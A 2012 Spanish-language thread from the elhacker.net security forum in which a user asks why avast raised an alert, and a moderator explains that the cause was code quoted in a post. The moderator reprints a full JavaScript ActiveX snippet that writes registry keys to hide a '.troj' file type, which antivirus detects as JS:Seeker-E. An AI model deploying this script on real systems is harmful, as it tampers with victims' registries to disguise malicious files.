elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  avast! infection detected en subforo analisis y diseño de malware
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: avast! infection detected en subforo analisis y diseño de malware  (Leído 3,463 veces)
xiruko


Desconectado Desconectado

Mensajes: 438


Ver Perfil
avast! infection detected en subforo analisis y diseño de malware
« en: 21 Abril 2012, 22:54 pm »

buenas gente,

alguien sabe por que puede darme este aviso al entrar en algunos temas en el subforo de analisis y diseño de malware?

me ha dado 2 en apenas 20 segundos, y el aviso es de este estilo:

Citar

decir que hace 2 o 3 semanas que lo tengo instalado y que vengo navegando por el foro y nunca me habia dado ninguna alarma.

agradeceria cualquier ayuda... gracias!


En línea

r32
Moderador
***
Desconectado Desconectado

Mensajes: 1.299



Ver Perfil WWW
Re: avast! infection detected en subforo analisis y diseño de malware
« Respuesta #1 en: 22 Abril 2012, 08:45 am »

Hola xiruko como puedes ver en la alerta es por un script del siguiente code:

Código:
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR\\.troj\\", "trojfile");
Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto");
Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", "");
Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");

}
catch(e) {}
}
catch(e) {}
}

setTimeout("f()", 1000);

</script>

Pegas ese code en un txt lo nombras como "ejemplo.js" y lo subes a analizar.
Aquí tienes el script analizado en Jotti:

Link: http://virusscan.jotti.org/es/scanresult/1e34f284e7944cbc9a58fe2a52a9b38697aaced4

2012-04-21 JS:Seeker-E

Saludos y gracias por el aviso !!!


« Última modificación: 22 Abril 2012, 11:16 am por r32 » En línea

xiruko


Desconectado Desconectado

Mensajes: 438


Ver Perfil
Re: avast! infection detected en subforo analisis y diseño de malware
« Respuesta #2 en: 22 Abril 2012, 14:10 pm »

vaya era por un code escrito en el post... me extraño ya que era la primera vez que me pasaba, y diria que no era la primera vez que veia un post con codes de este estilo.

bueno muchas gracias por la aclaracion!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines